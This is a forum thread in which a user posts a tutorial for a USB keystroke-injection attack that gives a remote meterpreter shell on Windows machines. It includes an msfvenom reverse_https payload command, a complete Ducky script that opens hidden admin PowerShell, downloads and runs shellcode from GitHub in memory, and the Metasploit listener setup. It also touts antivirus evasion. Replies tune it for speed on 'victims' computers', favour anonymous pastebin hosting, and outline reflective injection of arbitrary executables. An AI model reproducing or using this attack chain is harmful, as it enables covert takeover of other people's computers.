GunZofPeace Posted February 7, 2017 Posted February 7, 2017 (edited) Hello again friends! Today I will give a tutorial on how to create a payload that executes under 10 seconds and gives you a fully functioning meterpreter shell back to your kali linux machine. This is done under 20 lines of script. It's quite simple and works on any Windows machine with Powershell installed (Windows 7 and above comes preinstalled with this). I tested this first on my Windows 10 machine and works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin shall we? Step 1: Fire up Kali Linux and open a terminal. And using msfvenom we are going to create a shellcode. Enter this code: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt The first part "msfvenom" indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine, open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080, 4444. They all work. The -f parameter writes the shellcode in powershell format (obviously since we're using powershell). And the last part after the ">" indicates the location where this payload will be saved in. STEP 2: Now we are going to upload the shellcode to github or pastebin (whichever you prefer). Create a github account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on github and then upload the payload you just made (there are tutorials on google for uploading files). You can upload the file a couple different ways. The easiest is just log on github from your kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use pastebin, upload to that! STEP 3: Now the fun part! Time to code the ducky. Copy and Paste my code and change the corresponding lines. DELAY 500 GUI x DELAY 1000 a DELAY 1000 ALT y DELAY 1000 STRING powershell -WindowStyle hidden ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1') ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp') ENTER DELAY 1000 STRING Invoke-Shellcode -Shellcode ($buf) -Force ENTER What is going here in we are calling the windows + x button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up powershell, BUT IT OPENS IT UP HIDDEN. So the actual powershell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After powershell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, the second IEX string, you want replace the last link with whatever the link is to your script is on your github account. Remember the one you uploaded? You want to click on github, the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used pastebin, just place that link into the code. To set up the listener, open up a terminal in Kali. >msfconsole >use exploit/multi/handler >set payload windows/x64/meterpreter/reverse_https >set LHOST XXX (whatever IP you used, which would be your kali machine IP) >set LPORT XXX (whatever port you used) >exploit And there you go! Of course, have your listener before doing the attack. If you have any questions, please comment! this is my first actual tutorial, so feedback is wanted. Edited February 7, 2017 by GunZofPeace Quote
Pedrof Posted February 7, 2017 Posted February 7, 2017 Very good. I think the pastebin is better in this case because you can post anonymalsly, but its just my opinion... Do you think this will work with the meterpreter/reverse_tcp ? Quote
GunZofPeace Posted February 7, 2017 Author Posted February 7, 2017 Yeah pastepin works too! I just use github because I've used it in the past. And I believe so! I don't know why it wouldn't. Give it a try and let me know. Quote
henna3 Posted February 8, 2017 Posted February 8, 2017 Nice script man!, quick question Do you know if there is any way to convert a custom exe ( of your choice ) to a shellcode script? Thanks! Quote
kleo Posted February 8, 2017 Posted February 8, 2017 Any workarounds on initial run of powershell taking up so much time to open the uac dialog? Either choosing longer payload execution time or plugging in twice. Quote
GunZofPeace Posted February 8, 2017 Author Posted February 8, 2017 5 hours ago, henna3 said: Nice script man!, quick question Do you know if there is any way to convert a custom exe ( of your choice ) to a shellcode script? Thanks! I'm not sure. I don't see why you would do that though if the shellcode already gives you a meterpreter shell. I think the .exe has to be able to be converted into a powershell format, but google it! Sorry I can't help you with this Quote
GunZofPeace Posted February 8, 2017 Author Posted February 8, 2017 5 hours ago, kbeflo said: Any workarounds on initial run of powershell taking up so much time to open the uac dialog? Either choosing longer payload execution time or plugging in twice. So for this script I have the DELAY numbers quite high. it all depends on the computer specs, like how fast it is able to start up powershell, enter the commands, etc. Try lowering the DELAY numbers by half. It improves the speed greatly! Just test the script with different DELAYs and see how fast you can get your computer (or victims) computer to run the commands. Try putting 250 for the first four DELAYs. That should run it a lot quicker! Quote
Simon Posted March 19, 2017 Posted March 19, 2017 Quote On 7.2.2017 at 7:39 AM, GunZofPeace said: DELAY 500 GUI x DELAY 1000 a DELAY 1000 ALT y DELAY 1000 STRING powershell -WindowStyle hidden ENTER DELAY 1000 I think its posible to replace this code with: DELAY 500 GUI R STRING powershell -WindowSytle hidden ENTER DELAY 1000 It`s a little bit shorter and saves Time :) Quote
PoSHMagiC0de Posted April 25, 2017 Posted April 25, 2017 On 2/8/2017 at 8:17 AM, henna3 said: Nice script man!, quick question Do you know if there is any way to convert a custom exe ( of your choice ) to a shellcode script? Thanks! If it is unmanaged code, you can do it with Powersploit's Invoke-ReflectivePEInjection.ps1. The exe will need to be read in as a byte array to be used. You can load the Powersploit module into memory and then load your own script that will handle pulling down the exe that you already converted to byte array and then to base64 encoding to transfer. Decode back to byte array and then inject into your current process or select one with the arguments of the exe if any. If it is managed. You might can do it with reflections assembly but I only done this with .NET DLLs, do not know if it works with .NET exes. If you really want the shellcode, it has to be unmanaged code (C, C++, no .NET). You can use a disassember to get the op codes or use a c compiler to dump the object which will have the op codes. There are tutorials online on how this is done in more detail both ways. Anyway it goes, you may have to mess with it to get rid of nulls for it to be workable shellcode. The first 2 options involve no shellcoding and no disk touching. It looks like the primary use of this topic is to use meterpreter shellcode which msf can create for you easily. If you want to easily create shellcode to execute something, take a look at msf's payload windows/exec which can compile an unmanaged exe or even shellcode I believe. Quote
syra Posted June 13, 2017 Posted June 13, 2017 Hi! Thank you for your post. I am very new to all this and I could really use some help. I followed your instructions, so I got metasploit to start handler but it does not create a session. I did not get any errors but it seems that scripts, which supposed to be running on Windows, are not communicating back to the handler (that's at least what I think is happening). The problem might be because I saved the cmd code as .bat and .cmd. I run them both but did not notice in task manager that any of them started shell. Not sure what I am doing wrong but if anybody has any idea it would be much appreciated. Thank you. Quote
mst Posted January 2, 2022 Posted January 2, 2022 Hi guys I get an error on line 8 char 32 on the script can somebody help me please? Quote
Qashqaw Posted February 26, 2022 Posted February 26, 2022 On 2/7/2017 at 7:39 AM, GunZofPeace said: GUI x I'm trying to test this script on my WIndows 11 for testing - but when using GUI x - it'll start setting - and goes to renome the PC ( and then execute the commands as the new PCname) Should it be something else that GUI x in Windows 11 - for getting the access to the Powershell Quote
dark_pyrro Posted February 26, 2022 Posted February 26, 2022 What language is your Windows box using? Have you set the correct language when encoding the payload? Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.